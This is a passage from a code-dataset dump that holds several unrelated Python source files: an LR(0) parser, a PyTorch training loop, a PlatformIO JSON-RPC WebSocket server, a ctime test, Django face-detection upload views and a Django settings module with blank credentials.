'S': 1, 'A': 2, 'a': 3, 'b': 4}, {'action': 'acc'},\n {'action': 'shift', 'A': 6, 'a': 3, 'b': 4}, {'action': 'reduce 2'}, {'action': 'reduce 1'}]\n \"\"\"\n states = self.get_canonical_collection()\n # self.print_canonical_collection(states)\n table = [{} for _ in range(len(states))]\n\n for index in range(len(states)):\n state = states[index]\n first_rule_cnt = 0\n second_rule_cnt = 0\n third_rule_cnt = 0\n beta = []\n for prod in state:\n dot_index = prod[1].index('.')\n alpha = prod[1][:dot_index]\n beta = prod[1][dot_index + 1:]\n if len(beta) != 0:\n first_rule_cnt += 1\n else:\n if prod[0] != 'S1':\n second_rule_cnt += 1\n production_index = self.grammar.P.index((prod[0], alpha))\n elif alpha == [self.grammar.S[0]]:\n third_rule_cnt += 1\n if first_rule_cnt == len(state):\n table[index]['action'] = 'shift'\n\n elif second_rule_cnt == len(state):\n table[index]['action'] = 'reduce ' + str(production_index)\n\n elif third_rule_cnt == len(state):\n table[index]['action'] = 'acc'\n else:\n conflict_msg = 'Conflict! 
State I' + str(index) + ': ' + str(state) + '\\nSymbol: ' + beta[0]\n raise (Exception(conflict_msg))\n for symbol in self.grammar.N + self.grammar.E: # the goto part of the table\n next_state = self.go_to(state, symbol)\n if next_state in states:\n table[index][symbol] = states.index(next_state)\n # print(\"table\", table)\n return table\n\n def parse(self, input_string):\n \"\"\"\n inputStack - list of strings. PIF code for each token read from txt file.\n ['33', '18', '19', '16', '25', '0', '6', '1', '15', '31', '0', '15', '17']\n table - [{'action': 'shift', 'S': 1, 'A': 2, 'a': 3, 'b': 4}, {'action': 'acc'},\n {'action': 'shift', 'A': 5, 'a': 3, 'b': 4}, {'action': 'shift', 'A': 6, 'a': 3, 'b': 4},\n {'action': 'reduce 2'}, {'action': 'reduce 0'}, {'action': 'reduce 1'}]\n workingStack - used to parse the inputStack\n ['0']\n :param input_string: list of strings, equal to inputStack\n :return: output - [0,2,1,1,2]\n S -> .. -> aabb\n List of integers representing reduce states. Each production rule has a number/reduce_state).\n Output is the list of steps needed to obtain the input_string starting from starting non-terminal S.\n \"\"\"\n print(\"----------- Syntax analysis -----------\")\n table = self.generate_table()\n self.workingStack = ['0']\n self.inputStack = [char for char in input_string]\n self.output = []\n try:\n print(\"--------- Parsing ---------\")\n while len(self.workingStack) != 0:\n state = int(self.workingStack[-1]) # which dict from parsing table, index of state\n if len(self.inputStack) > 0:\n char = self.inputStack.pop(0)\n else:\n char = None\n if table[state]['action'] == 'shift':\n # Shift operation on the stack\n if char not in table[state]:\n raise (Exception(\"Syntax error! Expected \" + str(table[state]) +\n \"!\\nCannot parse shift. Character: \" + char))\n self.workingStack.append(char)\n self.workingStack.append(table[state][char])\n elif table[state]['action'] == 'acc':\n # Accept operation, sequence is accepted\n if len(self.inputStack) != 0:\n raise (Exception(\"Syntax error! Expected \" + str(table[state]) +\n \"!\\nCannot parse accept. Character: \" + char))\n self.workingStack.clear()\n else:\n # Reduce operation on the stack\n reduce_state = int(table[state]['action'].split(' ')[1])\n reduce_production = self.grammar.P[reduce_state]\n to_remove_from_working_stack = [symbol for symbol in reduce_production[1]]\n while len(to_remove_from_working_stack) > 0 and len(self.workingStack) > 0:\n if self.workingStack[-1] == to_remove_from_working_stack[-1]:\n to_remove_from_working_stack.pop()\n self.workingStack.pop()\n if len(to_remove_from_working_stack) != 0:\n raise (Exception('Syntax error!' +\n '!\\nCannot parse reduce. Character: ', char))\n self.inputStack.insert(0, char)\n self.inputStack.insert(0, reduce_production[0])\n self.output.insert(0, reduce_state)\n print('Syntax analysis successfully. 
Yay!')\n except Exception as ex:\n raise Exception(ex)\n print()\n return self.output\n\n @staticmethod\n def print_canonical_collection(cc):\n \"\"\"\n Print in a nicer format\n \"\"\"\n res = \"----------- Canonical Collection -----------\\n\"\n for elem in cc:\n res += str(elem) + \"\\n\"\n print(res)\n","sub_path":"Lab6 - Parser LR(0)/parser_algorithm/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219116895","text":"\"\"\"\nMain train loop\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport sys\nimport yaml\nfrom data import Data\nfrom pascal_context_data import PascalContextData\nimport torch.optim as optim\nfrom model import SimpleFCN\nimport pdb\n# reads the config file, returns appropriate instantiation of Data class\ndef _dataset_factory(cfg_file) -> Data:\n\tf = open(cfg_file, 'r')\n\tcfg = yaml.load(f)\n\tf.close()\n\tif cfg['name'] == 'pascal_context':\n\t\treturn PascalContextData(cfg)\n\telse:\n\t\tprint(\"Dataset name not matched\")\n\t\texit(-1)\n\n# reads the config file, returns appropriate instantiation of pytorch Module class\ndef _model_factory(cfg_file) -> torch.nn.Module:\n\tf = open(cfg_file, 'r')\n\tcfg = yaml.load(f)\n\tf.close()\n\tif cfg['name'] == 'simple_fcn':\n\t\treturn SimpleFCN(cfg)\n\telse:\n\t\tprint(\"Model name not matched\")\n\t\texit(-1)\n\n\t\t\ndef train(model, data):\n\t# train the model\n\tmodel.cuda()\n\tnum_batches = data.get_num_batches()\n\toptimizer = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\toptimizer.zero_grad()\n\tcriterion = nn.CrossEntropyLoss()\n\tfor epoch in range(10):\n\t\tdata.shuffle() # shuffle the dataset\n\t\tfor iter in range(num_batches):\n\t\t\t# inputs sholud be N x 224 x 224 x 3\n\t\t\tinputs, labels = data.get_batch(iter)\n\t\t\tinputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())\n\t\t\t# labels and outputs should be N x 28 x 28 x 459\n\t\t\tlabels_reshaped = labels.view(-1)\n\n\t\t\toutputs = model(inputs)\n\t\t\tpdb.set_trace()\n\t\t\toutputs_reshaped = outputs.view(-1,459)\n\t\t\tloss = criterion(outputs_reshaped, labels_reshaped)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tprint(loss.data[0])\n\n\t\t\t\nif __name__ == '__main__':\t \n\tdataset_cfg = sys.argv[1]\n\t# does nothing for now\n\tmodel_cfg = sys.argv[2]\n\t# load the appropriate dataset into a container\n\tdata = _dataset_factory(dataset_cfg)\n\tmodel = _model_factory(model_cfg)\n\ttrain(model, data)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"599733601","text":"# Copyright (c) 2014-present PlatformIO \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport inspect\nimport json\n\nimport click\nimport jsonrpc\nfrom starlette.endpoints import WebSocketEndpoint\n\nfrom platformio.compat import 
create_task, get_running_loop, is_bytes\nfrom platformio.proc import force_exit\n\n\nclass JSONRPCServerFactoryBase:\n\n connection_nums = 0\n shutdown_timer = None\n\n def __init__(self, shutdown_timeout=0):\n self.shutdown_timeout = shutdown_timeout\n self.dispatcher = jsonrpc.Dispatcher()\n\n def __call__(self, *args, **kwargs):\n raise NotImplementedError\n\n def addHandler(self, handler, namespace):\n self.dispatcher.build_method_map(handler, prefix=\"%s.\" % namespace)\n\n def on_client_connect(self):\n self.connection_nums += 1\n if self.shutdown_timer:\n self.shutdown_timer.cancel()\n self.shutdown_timer = None\n\n def on_client_disconnect(self):\n self.connection_nums -= 1\n if self.connection_nums < 1:\n self.connection_nums = 0\n\n if self.connection_nums == 0:\n self.shutdown_by_timeout()\n\n async def on_shutdown(self):\n pass\n\n def shutdown_by_timeout(self):\n if self.shutdown_timeout < 1:\n return\n\n def _auto_shutdown_server():\n click.echo(\"Automatically shutdown server on timeout\")\n force_exit()\n\n self.shutdown_timer = get_running_loop().call_later(\n self.shutdown_timeout, _auto_shutdown_server\n )\n\n\nclass WebSocketJSONRPCServerFactory(JSONRPCServerFactoryBase):\n def __call__(self, *args, **kwargs):\n ws = WebSocketJSONRPCServer(*args, **kwargs)\n ws.factory = self\n return ws\n\n\nclass WebSocketJSONRPCServer(WebSocketEndpoint):\n encoding = \"text\"\n factory: WebSocketJSONRPCServerFactory = None\n\n async def on_connect(self, websocket):\n await websocket.accept()\n self.factory.on_client_connect() # pylint: disable=no-member\n\n async def on_receive(self, websocket, data):\n create_task(self._handle_rpc(websocket, data))\n\n async def on_disconnect(self, websocket, close_code):\n self.factory.on_client_disconnect() # pylint: disable=no-member\n\n async def _handle_rpc(self, websocket, data):\n response = jsonrpc.JSONRPCResponseManager.handle(\n data, self.factory.dispatcher # pylint: disable=no-member\n )\n if response.result and inspect.isawaitable(response.result):\n try:\n response.result = await response.result\n response.data[\"result\"] = response.result\n response.error = None\n except Exception as exc: # pylint: disable=broad-except\n if not isinstance(exc, jsonrpc.exceptions.JSONRPCDispatchException):\n exc = jsonrpc.exceptions.JSONRPCDispatchException(\n code=4999, message=str(exc)\n )\n response.result = None\n response.error = exc.error._data # pylint: disable=protected-access\n new_data = response.data.copy()\n new_data[\"error\"] = response.error\n del new_data[\"result\"]\n response.data = new_data\n\n if response.error:\n click.secho(\"Error: %s\" % response.error, fg=\"red\", err=True)\n if \"result\" in response.data and is_bytes(response.data[\"result\"]):\n response.data[\"result\"] = response.data[\"result\"].decode(\"utf-8\")\n\n await websocket.send_text(json.dumps(response.data))\n","sub_path":"platformio/commands/home/rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441580114","text":"from datetime import datetime\nfrom unittest2 import TestCase\nfrom ert.util import ctime\n\n\nclass CTimeTest(TestCase):\n\n def test_c_time(self):\n c_time = ctime(0)\n self.assertEqual(str(c_time), \"1970-01-01 01:00:00\")\n\n date_time = ctime(datetime(1970, 1, 1, 1, 0, 0))\n self.assertEqual(c_time, date_time)\n\n date_time_after = ctime(datetime(1970, 1, 1, 1, 0, 5))\n\n self.assertTrue(date_time_after > 
date_time)","sub_path":"devel/python/test/ert_tests/util/test_ctime.py","file_name":"test_ctime.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"202034812","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom django.shortcuts import render\nfrom datetime import datetime\nfrom .models import Post, Img\n\n# trips/views.py\n\nfrom django.http import HttpResponse\n\nimport tensorflow as tf\nimport cv2, sys, numpy as np, os.path \ncascPath = \"/home/ai_primary_school/mysite/trips/haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\nfrom train import load_model\nfrom train import Model\nmodel = Model()\nmodel.load()\nmodel.predict(cv2.imread('/home/ai_primary_school/mysite/temp/test.jpg'))\n\ndef hello_world(request):\n return render(request, 'hello_world.html', {\n 'current_time': str(datetime.now()),\n })\n\ndef home(request):\n post_list = Post.objects.all()\n return render(request, 'home.html', {\n 'post_list': post_list,\n })\n\ndef post_detail(request, pk):\n post = Post.objects.get(pk=pk)\n return render(request, 'post.html', {'post': post})\n\n\ndef uploadImg(request): # 图片上传函数\n if request.method == 'POST':\n img = Img(img_url=request.FILES.get('img'))\n img.save()\n originPath = \"/home/ai_primary_school/mysite/media/img\"\n desPath = \"/home/ai_primary_school/mysite/temp\"\n for root, dirs, files in os.walk(originPath, topdown=False):\n for name in files: \n temp = cv2.imread(os.path.join(root, name)) \n cv2.imwrite(os.path.join(desPath, \"test.jpg\"), temp)\n return render(request, 'imgupload.html')\n\ndef showImg(request):\n imgDB = Img.objects.raw('SELECT * FROM trips_img ORDER BY 1 DESC LIMIT 1')\n imgs = cv2.imread('/home/ai_primary_school/mysite/temp/test.jpg')\n gray = cv2.cvtColor(imgs, cv2.COLOR_BGR2GRAY)\n result=0\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags = cv2.CASCADE_SCALE_IMAGE)\n for (x, y, w, h) in faces:\n #框出臉\n image=cv2.rectangle(imgs, (x, y), (x+w, y+h), (0, 255, 0), 2)\n #BGR轉RGB\n image = image[:,:,::-1]\n #將臉譜丟到丟到我們訓練的人臉分類神經網路\n result=model.predict(image)\n \n context = {\n 'imgs' : imgDB,\n 'current_time': result,\n }\n return render(request, 'showImg.html', context)\n\n\n\n\n\n\n\n\n\n","sub_path":"trips/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"269383209","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Django settings for project.\"\"\"\n\nimport os\n\n# sqlserver connection string\nfrom djimix.settings.local import LENEL_EARL, MSSQL_EARL\nfrom djimix.settings.local import INFORMIX_ODBC, INFORMIX_ODBC_TRAIN\nfrom djimix.settings.local import INFORMIX_ODBC_JXPROD, INFORMIX_ODBC_JXTEST\nfrom djimix.settings.local import (\n INFORMIXSERVER,\n DBSERVERNAME,\n INFORMIXDIR,\n ODBCINI,\n ONCONFIG,\n INFORMIXSQLHOSTS,\n LD_LIBRARY_PATH,\n LD_RUN_PATH,\n)\n\n# Debug\nDEBUG = False\nINFORMIX_DEBUG = 'debug'\nADMINS = (\n ('', ''),\n)\nMANAGERS = ADMINS\n\nSECRET_KEY = ''\nALLOWED_HOSTS = []\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/Chicago'\nSITE_ID = 1\nUSE_I18N = False\nUSE_L10N = False\nUSE_TZ = False\nDEFAULT_CHARSET = 'utf-8'\nFILE_CHARSET = 'utf-8'\nSERVER_URL = ''\nAPI_KEY = ''\nAPI_URL = '{0}/api/'.format(SERVER_URL)\nLIVEWHALE_API_URL = 'https://{0}'.format(SERVER_URL)\nSTATIC_URL = 
'https://{0}/static/djmapache/'.format(SERVER_URL)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nROOT_DIR = os.path.dirname(__file__)\nPROJECT_APP = os.path.basename(BASE_DIR)\nADMIN_MEDIA_PREFIX = '/static/admin/'\nROOT_URL = '/djmapache/'\nADMIN_MEDIA_PREFIX = '/static/admin/'\nMEDIA_ROOT = '{0}/assets/'.format(ROOT_DIR)\nSTATIC_ROOT = '{0}/static/'.format(ROOT_DIR)\nSTATIC_URL = '/static/{0}/'.format(PROJECT_APP)\nMEDIA_URL = '/media/{0}/'.format(PROJECT_APP)\nUPLOADS_DIR = '{0}files/'.format(MEDIA_ROOT)\nUPLOADS_URL = '{0}files/'.format(MEDIA_URL)\nROOT_URLCONF = 'djmapache.core.urls'\nWSGI_APPLICATION = 'djmapache.wsgi.application'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\nINSTALLED_APPS = [\n 'bootstrap4',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.humanize',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'djmapache.core',\n # needed for template tags\n 'djtools',\n # honeypot for admin attacks\n 'admin_honeypot',\n # sign in as a user\n 'loginas',\n]\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n# template stuff\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n '/data2/django_templates/djbootmin/',\n '/data2/django_templates/djcher/',\n '/data2/django_templates/django-djskins/',\n '/data2/livewhale/includes/',\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'debug': DEBUG,\n 'context_processors': [\n 'djtools.context_processors.sitevars',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n# caching\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': '127.0.0.1:11211',\n 'TIMEOUT': 60 * 60 * 24,\n 'KEY_PREFIX': 'djmapache_',\n },\n}\n# LDAP Constants\nLDAP_SERVER = ''\nLDAP_SERVER_PWM = ''\nLDAP_PORT = ''\nLDAP_PORT_PWM = ''\nLDAP_PROTOCOL = ''\nLDAP_PROTOCOL_PWM = ''\nLDAP_BASE = ''\nLDAP_USER = ''\nLDAP_PASS = ''\nLDAP_EMAIL_DOMAIN = ''\nLDAP_OBJECT_CLASS = ''\nLDAP_OBJECT_CLASS_LIST = []\nLDAP_GROUPS = {}\nLDAP_RETURN = []\nLDAP_RETURN_PWM = []\nLDAP_ID_ATTR = ''\nLDAP_CHALLENGE_ATTR = ''\nLDAP_AUTH_USER_PK = False\n# auth backends\nAUTHENTICATION_BACKENDS = (\n 'djauth.backends.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\nSAML_FOLDER = os.path.join(BASE_DIR, 
'saml')\n# login/logout\nLOGIN_URL = '{}accounts/login/'.format(ROOT_URL)\nLOGOUT_REDIRECT_URL = '{}accounts/loggedout/'.format(ROOT_URL)\nLOGIN_REDIRECT_URL = ROOT_URL\n# needed for backwards compatability\nLOGOUT_URL = LOGOUT_REDIRECT_URL\nUSE_X_FORWARDED_HOST = True\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nSESSION_COOKIE_DOMAIN = '.carthage.edu'\nSESSION_COOKIE_NAME = 'django_djmapache_cookie'\nSESSION_COOKIE_AGE = 86400\n# SMTP settings\nEMAIL_HOST = ''\nEMAIL_HOST_USER = ''\nEMAIL_HOST_PASSWORD = ''\nEMAIL_USE_TLS = True\nEMAIL_PORT = 587\nEMAIL_FAIL_SILENTLY = False\nDEFAULT_FROM_EMAIL = ''\nSERVER_EMAIL = ''\nSERVER_MAIL = ''\nREQUIRED_ATTRIBUTE = True\n# logging\nLOG_FILEPATH = os.path.join(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'logs/',\n)\nDEBUG_LOG_FILENAME = LOG_FILEPATH + 'debug.log'\nINFO_LOG_FILENAME = LOG_FILEPATH + 'info.log'\nERROR_LOG_FILENAME = LOG_FILEPATH + 'error.log'\nCUSTOM_LOG_FILENAME = LOG_FILEPATH + 'custom.log'\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s',\n 'datefmt': '%Y/%b/%d %H:%M:%S',\n },\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',\n 'datefmt': '%Y/%b/%d %H:%M:%S',\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s',\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse',\n },\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'logfile': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': LOG_FILENAME,\n 'formatter': 'standard',\n },\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n },\n 'mail_admins': {\n 'level': 'ERROR',\n #'filters': ['require_debug_false'],\n 'include_html': True,\n 'class': 'django.utils.log.AdminEmailHandler',\n },\n },\n 'loggers': {\n 'custom_logfile': {\n 'level': 'ERROR',\n 'class': 'logging.FileHandler',\n 'filename': CUSTOM_LOG_FILENAME,\n 'formatter': 'custom',\n },\n 'info_logfile': {\n 'level': 'INFO',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'backupCount': 10,\n 'maxBytes': 50000,\n 'filename': INFO_LOG_FILENAME,\n 'formatter': 'simple',\n },\n 'debug_logfile': {\n 'level': 'DEBUG',\n 'handlers': ['logfile'],\n 'class': 'logging.FileHandler',\n 'filename': DEBUG_LOG_FILENAME,\n 'formatter': 'verbose',\n },\n 'error_logfile': {\n 'level': 'ERROR',\n 'class': 'logging.FileHandler',\n 'filename': ERROR_LOG_FILENAME,\n 'formatter': 'verbose',\n },\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n 'level': 'WARN',\n },\n 'django.db.backends': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n },\n}\n\n# PacketFence Apps\nPACKETFENCE_API_EARL = ''\nPACKETFENCE_USERNAME = ''\nPACKETFENCE_PASSWORD = ''\nPACKETFENCE_LOGIN_ENDPOINT = ''\nPACKETFENCE_REPORTS_ENDPOINT = ''\nPACKETFENCE_IP4LOGS_ENDPOINT = ''\nPACKETFENCE_NODE_ENDPOINT = ''\n# Handshake Application\nHANDSHAKE_CSV_OUTPUT = ''\nHANDSHAKE_CSV_ARCHIVED = ''\nHANDSHAKE_TO_EMAIL = []\nHANDSHAKE_FROM_EMAIL = ''\nHANDSHAKE_ACCESS_KEY = ''\nHANDSHAKE_SECRET = ''\nHANDSHAKE_BUCKET = ''\nHANDSHAKE_S3_FOLDER = ''\n# scripsafe\n#\n# external scripsafe server\nSCRIP_SAFE_XTRNL_SERVER = ''\nSCRIP_SAFE_XTRNL_USER = ''\nSCRIP_SAFE_XTRNL_KEY = 
'{0}/scripsafe_rsa'.format(BASE_DIR)\n# server on which our transcrip reside\nSCRIP_SAFE_LOCAL_SERVER = ''\nSCRIP_SAFE_LOCAL_USER = ''\nSCRIP_SAFE_LOCAL_KEY = '{0}/carsu_rsa'.format(BASE_DIR)\nSCRIP_SAFE_LOCAL_SPOOL = ''\nSCRIP_SAFE_LOCAL_BACKUP = ''\nSCRIP_SAFE_LOCAL_PATH = ''\n# transcrip file names start with 'cfa'\nSCRIP_SAFE_FILE_PREFIX = 'cfa'\n# SFTP connection dictionaries\nSCRIP_SAFE_XTRNL_CONNECTION = {\n 'host': SCRIP_SAFE_XTRNL_SERVER,\n 'username': SCRIP_SAFE_XTRNL_USER,\n 'private_key': SCRIP_SAFE_XTRNL_KEY,\n}\nSCRIP_SAFE_LOCAL_CONNECTION = {\n 'host': SCRIP_SAFE_LOCAL_SERVER,\n 'username': SCRIP_SAFE_LOCAL_USER,\n 'private_key': SCRIP_SAFE_LOCAL_KEY,\n}\n# pdf settings\nSCRIP_SAFE_FONT_SIZE = 7.5\nSCRIPT_SAFE_LEADING = 10\nSCRIP_SAFE_RIGHT_MARGIN = 0.25\nSCRIP_SAFE_LEFT_MARGIN = 0.075\nSCRIP_SAFE_TOP_MARGIN = 0.40\nSCRIP_SAFE_BOTTOM_MARGIN = 0.40\n# Terradotta\nTERRADOTTA_HOST = ''\nTERRADOTTA_USER = ''\nTERRADOTTA_PKEY = ''\nTERRADOTTA_PASS = ''\nTERRADOTTA_CSV_OUTPUT = ''\n# oclc\n# external oclc server\nOCLC_XTRNL_SRVR = ''\nOCLC_XTRNL_USER = ''\nOCLC_XTRNL_PASS = ''\nOCLC_XTRNL_PATH = ''\nOCLC_LOCAL_PATH = ''\n# SFTP connection dictionaries\nOCLC_XTRNL_CONNECTION = {\n 'host': OCLC_XTRNL_SRVR,\n 'username': OCLC_XTRNL_USER,\n 'password': OCLC_XTRNL_PASS,\n}\n# oclc\nOCLC_TO_EMAIL = []\nOCLC_FROM_EMAIL = ''\nOCLC_GROUPINDEX_LIST_INDEX = 12\n# external oclc server\nOCLC_ENSXTRNL_SRVR = ''\nOCLC_ENSXTRNL_USER = ''\nOCLC_ENSXTRNL_PASS = ''\nOCLC_ENSXTRNL_PATH = ''\nOCLC_ENSLOCAL_PATH = ''\n# SFTP connection dictionaries\nOCLC_ENSXTRNL_CONNECTION = {\n 'host': OCLC_ENSXTRNL_SRVR,\n 'username': OCLC_ENSXTRNL_USER,\n 'password': OCLC_ENSXTRNL_PASS,\n}\n# Barnes and Noble AIP\nBARNESNOBLE_AIP_HOST = ''\nBARNESNOBLE_AIP_USER = ''\nBARNESNOBLE_AIP_PORT = ''\nBARNESNOBLE_AIP_HOME = ''\nBARNESNOBLE_AIP_DATA = ''\nBARNESNOBLE_AIP_KEY = ''\n# Barnes and Noble 1\nBARNESNOBLE1_HOST = ''\nBARNESNOBLE1_USER = ''\nBARNESNOBLE1_PKEY = ''\nBARNESNOBLE1_PASS = ''\nBARNESNOBLE1_PORT = 0\n# Barnes and Noble 2\nBARNESNOBLE2_HOST = ''\nBARNESNOBLE2_USER = ''\nBARNESNOBLE2_PKEY = ''\nBARNESNOBLE2_PASS = ''\nBARNESNOBLE2_PORT = 0\n#\nBARNESNOBLE_CSV_OUTPUT = ''\nBARNESNOBLE_CSV_ARCHIVED = ''\nBARNESNOBLE_TO_EMAIL = []\nBARNESNOBLE_FROM_EMAIL = ''\n#\nBARNES_N_NOBLE_CSV_OUTPUT = ''\nBARNES_N_NOBLE_TO_EMAIL = []\nBARNES_N_NOBLE_FROM_EMAIL = ''\n# Package Concierge\nCONCIERGE_HOST = ''\nCONCIERGE_USER = ''\nCONCIERGE_PASS = ''\nCONCIERGE_PORT = 0\nCONCIERGE_CSV_OUTPUT = ''\nCONCIERGE_CSV_ARCHIVED = ''\nCONCIERGE_TO_EMAIL = []\nCONCIERGE_FROM_EMAIL = ''\n# maxient\nMAXIENT_HOST = ''\nMAXIENT_USER = ''\nMAXIENT_PKEY = ''\nMAXIENT_PASS = ''\nMAXIENT_CSV_OUTPUT = ''\nMAXIENT_TO_EMAIL = []\nMAXIENT_FROM_EMAIL = ''\nMAXIENT_HEADERS = [\n 'Carthage ID',\n 'Username',\n 'Last Name',\n 'First Name',\n 'Middle Name',\n 'Date of Birth',\n 'Gender',\n 'Ethnicity',\n 'Building',\n 'Room Number',\n 'Local Mailing Address',\n 'Local City',\n 'Local State',\n 'Local Zip',\n 'Local Phone',\n 'Cell Phone',\n 'Permanent Address',\n 'Permanent City',\n 'Permanent State',\n 'Permanent Zip',\n 'Permanent Country',\n 'Permanent Phone',\n 'Emergency Contact',\n 'Email Address',\n 'Classification',\n 'Academic Major',\n 'Academic Advisor',\n 'GPA Recent',\n 'GPA Cumulative',\n 'Athlete',\n 'Greek',\n 'Honors',\n 'ROTC Vet',\n 'Last Update',\n]\n# Everbridge\nEVERBRIDGE_HOST = ''\nEVERBRIDGE_USER = ''\nEVERBRIDGE_PKEY = ''\nEVERBRIDGE_CSV_OUTPUT = ''\nEVERBRIDGE_TO_EMAIL = []\nEVERBRIDGE_FROM_EMAIL = 
''\nEVERBRIDGE_FACSTAFF_HEADERS = [\n 'First Name',\n 'Middle Initial',\n 'Last Name',\n 'Suffix',\n 'External ID',\n 'SSO User ID',\n 'Country',\n 'Business Name',\n 'Record Type',\n 'Phone 1',\n 'Phone Country 1',\n 'Phone 2',\n 'Phone Country 2',\n 'Email Address 1',\n 'Email Address 2',\n 'SMS 1',\n 'SMS 1 Country',\n 'Custom Field 1',\n 'Custom Value 1',\n 'Custom Field 2',\n 'Custom Value 2',\n 'Custom Field 3',\n 'Custom Value 3',\n 'END',\n]\nEVERBRIDGE_STUDENT_HEADERS = [\n 'First Name',\n 'Middle Initial',\n 'Last Name',\n 'Suffix',\n 'External ID',\n 'SSO User ID',\n 'Country',\n 'Business Name',\n 'Record Type',\n 'Phone 1',\n 'Phone Country 1',\n 'Email Address 1',\n 'Email Address 2',\n 'SMS 1',\n 'SMS 1 Country',\n 'Custom Field 1',\n 'Custom Value 1',\n 'Custom Field 2',\n 'Custom Value 2',\n 'Custom Field 3',\n 'Custom Value 3',\n 'Custom Field 4',\n 'Custom Value 4',\n 'Custom Field 5',\n 'Custom Value 5',\n 'Custom Field 6',\n 'Custom Value 6',\n 'END',\n]\n# Papercut\nPAPERCUT_CSV_OUTPUT = ''\nPAPERCUT_CSV_ARCHIVED = ''\nPAPERCUT_TO_EMAIL = []\nPAPERCUT_FROM_EMAIL = ''\nPAPERCUT_BCC_EMAIL = ''\n# Common Application\nCOMMONAPP_HOST = ''\nCOMMONAPP_USER = ''\nCOMMONAPP_PKEY = ''\nCOMMONAPP_PASS = ''\nCOMMONAPP_CSV_OUTPUT = ''\nCOMMONAPP_CSV_ARCHIVED = ''\nCOMMONAPP_TO_EMAIL = []\nCOMMONAPP_FROM_EMAIL = ''\n# OrgSync\nORGSYNC_HOST = ''\nORGSYNC_USER = ''\nORGSYNC_PKEY = ''\nORGSYNC_PASS = ''\nORGSYNC_CSV_OUTPUT = ''\nORGSYNC_TO_EMAIL = []\nORGSYNC_FROM_EMAIL = ''\n# 